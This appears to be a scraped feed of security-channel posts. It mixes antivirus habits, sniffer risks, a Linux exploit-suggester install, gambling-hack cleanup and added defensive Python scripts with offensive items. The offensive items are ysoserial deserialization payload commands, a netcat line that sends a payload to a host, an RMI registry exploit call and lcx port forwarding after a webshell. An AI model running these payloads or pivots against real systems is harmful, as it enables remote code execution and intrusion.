UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform that collects & analyzes every new hacking method, plus AI practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ UnDerCoDe ▄ ▂ ▁

🦑 Eight basic principles to stay away from viruses:

1. Establish good security habits. For example: do not open emails and attachments of unknown origin, do not visit unknown websites, and do not execute software downloaded from the Internet without first scanning it with anti-virus software. These habits will make your computer more secure.

2. Turn off or delete unnecessary services in the system. By default, many operating systems install auxiliary services such as an FTP client, Telnet and a web server. These services are convenient for attackers but of little use to most users; removing them greatly reduces the chance of being attacked.

3. Apply security patches frequently. According to statistics, 80% of network viruses spread through system security vulnerabilities (for example Worm King, Shockwave and Sasser), so regularly download the latest security patches from the Microsoft website to prevent infection before it happens.

4. Use complex passwords. Many network viruses attack systems by guessing simple passwords, so using complex passwords greatly improves the computer's security.

5. Quickly isolate an infected computer. When you find a virus or an abnormality on your computer, disconnect it from the network immediately, both to limit further infection of that machine and to stop it becoming a source that infects other computers.

6. Learn some virus knowledge, so that you can recognise new viruses in time and take appropriate measures to protect your computer at critical moments. If you understand the registry, you can regularly check the registry's auto-start items for suspicious keys; if you understand memory, you can regularly check whether suspicious programs are running in memory.

7. Install professional anti-virus software for comprehensive monitoring. With the ever-increasing number of viruses, anti-virus software is an increasingly economical choice. After installing it, however, users should upgrade it frequently, keep the main monitors (such as mail monitoring and memory monitoring) enabled, and report problems, so as to truly protect the computer's security.

8. Users should also install personal firewall software to prevent hacker attacks. With the development of the Internet, hacker attacks on users' computers are becoming more and more serious, and many network viruses use hacking techniques to attack users' computers. Therefore, users should install personal firewall software with the security level set to medium or high, so as to effectively prevent network attacks.


@undercodeTesting
▁ ▂ ▄ UnDerCoDe ▄ ▂ ▁

🦑 Usually the content a sniffer cares about can be divided into the following categories:

1. Passwords
I think this is the reason for the vast majority of illegal uses of sniffers: a sniffer can record user IDs and passwords transmitted in plain text. Even if you encrypt data during network transmission, the data recorded by a sniffer lets the intruder try to work out your algorithm at leisure, at home.

2. Financial accounts
Many users feel at ease using their credit card or cash account on the Internet, but a sniffer can easily intercept the user name, password, credit card number, expiration date, account number and PIN sent online.

3. Peeping at confidential or sensitive information and data
By intercepting data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept an entire email conversation.

4. Spying on low-level protocol information
This is a terrible thing, I think: by recording the underlying protocol information, the intruder learns such things as the network interface addresses of two hosts, the remote network interface IP address, IP routing information, and the sequence numbers of a TCP connection.

> This information poses great harm to network security once an illegal intruder holds it. Usually someone uses sniffers to collect this information for only one reason: he is conducting a spoofing attack (IP address spoofing usually requires you to insert the TCP connection sequence number accurately, which will be covered in a future article). If someone is very concerned with this issue, then the sniffer is just a prelude for him, and the problems to come will be much bigger.

@undercodeTesting
▁ ▂ ▄ UnDerCoDe ▄ ▂ ▁

🦑 LES: Linux privilege escalation auditing tool:

INSTALLATION & RUN:

1) DOWNLOAD:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

> Details about LES usage and inner workings:

https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for LES:

https://github.com/mzet-/les-res

2) cd into the directory where les.sh was saved

3) $ chmod +x les.sh && ./les.sh
(The download above saved the script as les.sh; the README examples below use its original name, linux-exploit-suggester.sh.)

4) For each exploit, an exposure is calculated. The following 'Exposure' states are possible:

1️⃣ Highly probable - the assessed kernel is most probably affected and there's a very good chance that the PoC exploit will work out of the box without any major modifications.

2️⃣ Probable - it's possible that the exploit will work, but most likely customization of the PoC exploit will be needed to suit your target.

3️⃣ Less probable - additional manual analysis is needed to verify whether the kernel is affected.

4️⃣ Unprobable - highly unlikely that the kernel is affected (the exploit is not displayed in the tool's output).

5) Verifying the state of kernel hardening security measures
LES can check most of the security settings available in your Linux kernel. It verifies not only the kernel's compile-time configuration (CONFIGs) but also its run-time settings (sysctl), giving a more complete picture of the security posture of the running kernel. This functionality is a modern continuation of the --kernel switch from the checksec.sh tool by Tobias Klein. Example of tool usage:

$ ./linux-exploit-suggester.sh --checksec

6) Assess exposure of the Linux box on publicly known exploits:

$ ./linux-exploit-suggester.sh
Show state of security features on the Linux box:

$ ./linux-exploit-suggester.sh --checksec
Assess exposure of a Linux kernel to publicly known exploits based on a provided 'uname' string (i.e. the output of the uname -a command):

$ ./linux-exploit-suggester.sh --uname <uname-string>
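
As an added example (not part of LES or the original post), the script below models the run-time half of --checksec: it reads a handful of kernel hardening sysctls from /proc/sys and grades each against a baseline. The expected values are this example's assumptions about a typical hardened configuration rather than LES's own rules, and compile-time CONFIG checks are left out.

```python
"""Grade run-time kernel hardening sysctls (simplified model of LES --checksec)."""
import os

# Knob -> (predicate on the integer value, expectation shown in the report).
# Expected values are this example's assumed hardening baseline, not LES's own table.
BASELINE = {
    "kernel.randomize_va_space":        (lambda v: v == 2, "== 2 (full ASLR)"),
    "kernel.kptr_restrict":             (lambda v: v >= 1, ">= 1 (hide kernel pointers)"),
    "kernel.dmesg_restrict":            (lambda v: v == 1, "== 1 (dmesg needs CAP_SYSLOG)"),
    "kernel.yama.ptrace_scope":         (lambda v: v >= 1, ">= 1 (restricted ptrace attach)"),
    "kernel.unprivileged_bpf_disabled": (lambda v: v >= 1, ">= 1 (no unprivileged bpf())"),
    "kernel.perf_event_paranoid":       (lambda v: v >= 2, ">= 2 (no unprivileged perf)"),
    "fs.protected_symlinks":            (lambda v: v == 1, "== 1"),
    "fs.protected_hardlinks":           (lambda v: v == 1, "== 1"),
    "fs.suid_dumpable":                 (lambda v: v == 0, "== 0 (no setuid core dumps)"),
}

def sysctl_path(name):
    """kernel.kptr_restrict -> /proc/sys/kernel/kptr_restrict"""
    return os.path.join("/proc/sys", *name.split("."))

def read_sysctls(names):
    """Read each knob from /proc/sys; knobs this kernel lacks map to None."""
    values = {}
    for name in names:
        try:
            with open(sysctl_path(name)) as fh:
                values[name] = int(fh.read().split()[0])
        except (OSError, ValueError, IndexError):
            values[name] = None
    return values

def assess(values):
    """Return {knob: 'ok' | 'weak' | 'missing'} for a dict of current values."""
    verdicts = {}
    for name, (is_ok, _) in BASELINE.items():
        current = values.get(name)
        verdicts[name] = "missing" if current is None else ("ok" if is_ok(current) else "weak")
    return verdicts

def report(values):
    """One line per knob: verdict, knob, current value, expectation."""
    verdicts = assess(values)
    return "\n".join(f"{verdicts[n]:8s} {n} = {values.get(n)}  (expected {BASELINE[n][1]})"
                     for n in BASELINE)

if __name__ == "__main__":
    # Grade the kernel this script runs on.
    print(report(read_sysctls(BASELINE)))
```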


USE FOR LEARNING!!!
verified @UndercodeTesting
✅ git topic
▁ ▂ ▄ UnDerCoDe ▄ ▂ ▁
Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step) #Highrequested
Forwarded from UNDERCODE NEWS
The world's largest ATM makers, Diebold Nixdorf and NCR, have released software updates for their devices.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
University of Utah officials said the university was recently compelled to pay hackers $457,059 to avoid the leaking of student records #Leaks
▁ ▂ ▄ UnDerCoDe ▄ ▂ ▁

🦑 #EXPLOITATION:

> ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

INSTALLATION & RUN:

1) download https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
2) $ java -jar ysoserial.jar

3) Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'

4) $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd

0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:

5) $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin

6) $ nc 10.10.10.10 1099 < groovypayload.bin

7) $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

🦑 R E Q U I R E M E N T S :

Building from source requires Java 1.7+ and Maven 3.x+:

mvn clean package -DskipTests
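
Added here as a defensive counterpart (example code, not ysoserial's or the original post's): a Python heuristic that recognises a JDK serialization stream by the aced 0005 magic that opens the dump above, pulls class names out of TC_CLASSDESC records, and flags blobs naming known gadget classes such as the sun.reflect.annotation.AnnotationInvocationHandler visible in that dump, so a gateway or log pipeline can alert on them before they reach an ObjectInputStream. The sample streams are constructed inline to mirror the dump's structure, and the denylist is a short illustrative one.

```python
"""Flag JDK serialization blobs that name well-known gadget classes (heuristic)."""
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"    # STREAM_MAGIC + STREAM_VERSION, the dump's first 4 bytes
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72  # the 's' 'r' bytes that follow in the dump

# Illustrative denylist: classes used by widely known gadget chains.
GADGET_CLASS_HINTS = {
    "sun.reflect.annotation.AnnotationInvocationHandler",  # visible in the dump above
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections.functors.ChainedTransformer",
}
_JAVA_NAME = re.compile(rb"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+$")

def is_java_serialized(data: bytes) -> bool:
    """True when the blob starts with the serialization magic and version."""
    return data[:4] == STREAM_MAGIC

def extract_class_names(data: bytes) -> list:
    """Scan for TC_CLASSDESC (0x72) + 2-byte big-endian length + class name.
    Not a full stream parser (no handles, block data, ...): it keeps only
    candidates that look like fully qualified Java class names."""
    names, i = [], 0
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", data[i + 1:i + 3])
            candidate = data[i + 3:i + 3 + length]
            if len(candidate) == length and _JAVA_NAME.match(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return names

def gadget_hits(data: bytes) -> list:
    """Denylisted class names found in the blob; empty for non-serialized input."""
    if not is_java_serialized(data):
        return []
    return [n for n in extract_class_names(data) if n in GADGET_CLASS_HINTS]

def _classdesc(name: str) -> bytes:
    """Constructed TC_CLASSDESC: tag, UTF name, zeroed serialVersionUID, flags, 0 fields."""
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name.encode()
            + b"\0" * 8 + b"\x02\x00\x00")

# Constructed sample streams shaped like the dump above (truncated, not runnable payloads).
SUSPICIOUS_STREAM = (STREAM_MAGIC + bytes([TC_OBJECT])
                     + _classdesc("sun.reflect.annotation.AnnotationInvocationHandler") + b"\x78\x70")
BENIGN_STREAM = STREAM_MAGIC + bytes([TC_OBJECT]) + _classdesc("java.util.HashMap") + b"\x78\x70"
```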

VERIFIED @undercodeTesting
▁ ▂ ▄ UnDerCoDe ▄ ▂ ▁

🦑 What should I do if my website is hacked and injected with gambling pages?

Whenever there are competitions such as the European Cup, the World Cup and the Olympic Games, gambling groups do their utmost to hack normal websites, especially high-traffic information websites. Through internal testing, Baidu found that the number of sites hacked during the European Cup is on the rise, and it has increased the efficiency and severity of its penalties. So, how can a site avoid being hacked?

[Self-check: has the site been hacked?]

1. A hacked website shows a characteristic pattern in its data: the index volume and the traffic from search engines increase dramatically in a short period. Webmasters can therefore use the index volume tool of the Baidu webmaster platform to watch for anomalies in the site's indexed pages; if a sudden increase is found, use the traffic and keyword tool to check whether the keywords bringing traffic are related to the website, or whether they involve gambling and pornography.

2. Query the site with the site: search operator combined with common gambling and pornography keywords; this can reveal illegal pages that do not belong to the site.

3. Because Baidu carries huge traffic, some hacks only redirect visitors who arrive from Baidu, which makes them hard for the webmaster to notice. Therefore, when checking whether your site is hacked, click through to your site's pages from the Baidu search results and see whether you are redirected to another site.

4. The site's content is marked as risky in the search results.

* Afterwards, you can ask the website's technical staff to further confirm whether the website has been hacked through backend data and programs.

[How to deal with being hacked]

After confirming that the website has been hacked, in addition to having technical staff make quick corrections, SEO staff also need to do some follow-up and preventive work.

1. Immediately stop the website service to prevent users and other sites from continuing to be affected (returning a 503 status code is recommended).

2. If multiple sites on the same hosting provider are hacked during the same period, contact the hosting provider and urge them to respond.

3. Clean up the discovered hacked content, set the hacked pages to return 404 as dead links, and submit them through the dead link submission tool of the Baidu webmaster platform.

4. Work out the likely time of the hack, compare it with the file modification times on the server, and deal with the files the hackers uploaded or modified; check the user management settings on the server to confirm there are no abnormal changes; and change the server's user access passwords. Note: the likely time of the hack can be determined from the access log, but the hacker may also have modified the server's access log.

5. Do a good job on security: check the website for vulnerabilities and prevent it from being hacked again.

The above is how to deal with a website that has been hacked and injected with gambling pages.
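
As an added example (not from the original post or Baidu's tooling), a Python triage script for steps 2 to 4 above: it lists files in the web root modified since the suspected hack time and tags their content with two heuristics, referer-conditional code keyed on search engines (the redirect-only-Baidu-visitors behaviour from self-check 3) and gambling keywords. The keyword list, the search-engine pattern and the usage values are constructed for illustration.

```python
"""Triage a web root after a suspected gambling-page injection."""
import os
import re

# Heuristic signatures; these patterns are this example's own, not Baidu's.
REFERER_CHECK = re.compile(rb"HTTP_REFERER", re.I)                # code that inspects the referer
SEARCH_ENGINE = re.compile(rb"baidu|sogou|so\.com|spider", re.I)  # ... and keys on a search engine
SPAM_WORDS = re.compile(rb"casino|betting|lottery|poker", re.I)   # constructed gambling keyword list

def classify_content(data: bytes) -> set:
    """'cloaking' for referer-conditional search-engine code, 'spam' for gambling terms."""
    tags = set()
    if REFERER_CHECK.search(data) and SEARCH_ENGINE.search(data):
        tags.add("cloaking")
    if SPAM_WORDS.search(data):
        tags.add("spam")
    return tags

def modified_since(entries, since_epoch):
    """entries: iterable of (path, mtime); keep files touched at or after the suspected hack time."""
    return sorted(path for path, mtime in entries if mtime >= since_epoch)

def walk_webroot(root):
    """Yield (path, mtime) for every regular file under root."""
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                yield path, os.stat(path).st_mtime
            except OSError:
                continue

def triage(root, since_epoch):
    """Recently modified files -> content tags (an empty set means only the mtime is suspicious)."""
    findings = {}
    for path in modified_since(walk_webroot(root), since_epoch):
        try:
            with open(path, "rb") as fh:
                findings[path] = classify_content(fh.read(2_000_000))  # cap per-file read
        except OSError:
            findings[path] = {"unreadable"}
    return findings

if __name__ == "__main__":
    import sys, time
    # usage: triage.py /var/www/html "2020-06-12 03:00"  (constructed: local time of the suspected hack)
    since = time.mktime(time.strptime(sys.argv[2], "%Y-%m-%d %H:%M"))
    for path, tags in triage(sys.argv[1], since).items():
        print(f"{','.join(sorted(tags)) or 'recent':12s} {path}")
```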

@UndercodeTesting
▁ ▂ ▄ UnDerCoDe ▄ ▂ ▁

🦑 lcx usage experience (piracy)
Example: why do port forwarding?

If the target is an external (public) network server, we can access it directly by connecting to its port, without port forwarding.

Generally, we distinguish four situations:

1. This machine's intranet to another machine's external network: it can connect directly; for example, when we browse a website we connect to port 80 of the external web server;

2. This machine's external network to another machine's external network: same as the example above;

3. This machine's external network to another machine's intranet: if we open port 3389 on its server after getting a webshell, but when we connect to its port 3389 we cannot reach it. At this point, experienced people will already have checked the server's status after getting the webshell (ipconfig); everyone understands this, so I won't explain it! This is the second highlight of what I want to talk about: at this point, our idea is to forward its port 3389, and this is where lcx.exe comes in.

@UndercodeTesting
▁ ▂ ▄ UnDerCoDe ▄ ▂ ▁

🦑 #FastTips: popular, effective ways accounts get hacked:


1) Attacks at the software level
Injection of malware into the user's system, or exploitation of vulnerabilities in existing software. This is still the most widespread and effective hacking method. The proliferation of anti-virus products, built-in firewalls, mandatory UAC and auto-updates, which raise the overall security of the OS, somewhat improves the situation, but cannot 100% protect users from their own rash actions.

2) Attacks at the traffic level
There are two types of such attacks: sniffing unprotected traffic, and attacks on protected traffic (man in the middle, MITM).

a) This method of hacking is more effective than the first, but technically harder to carry out, so it has not become as widespread. First of all, because of its limited territoriality: the attack must be carried out directly on the incoming and outgoing connections, and for that you need physical access to them.

b) In the second method, a secure connection is still established, but not between the user's certificate and the server's certificate: instead between the attacker and the server (hence the name MITM, man-in-the-middle attack). After the "necessary" certificate has been planted, the compromised traffic is available to the hacker in decrypted form, which lets him extract and save credentials from it.


By the way, both of these methods are also used at the software level: when malware replaces a certificate, or a software sniffer runs locally.

3) User-level attacks
Social engineering techniques; in other words, deliberately deceiving a user in order to obtain credentials. The victim is misled while communicating over Internet channels or by phone, after which they hand over everything needed to the attacker themselves. Despite the high labor cost, such an attack is very effective for obtaining a specific user's account.


4) Attack at the server (service provider) level
An extremely rare type of attack: theoretically possible, but in practice extremely rare. Here it is worth debunking the popular myth that "the social network was hacked": in such a situation it was not the social network that was hacked but a particular user's devices. And most likely the user himself helped the attacker, who used the trick from point 1 or a combination of points 1 and 3. So users need not fear the "hacked social network" scenario, but should be more attentive to their own actions.
@UndercodeTesting
▁ ▂ ▄ UnDerCoDe ▄ ▂ ▁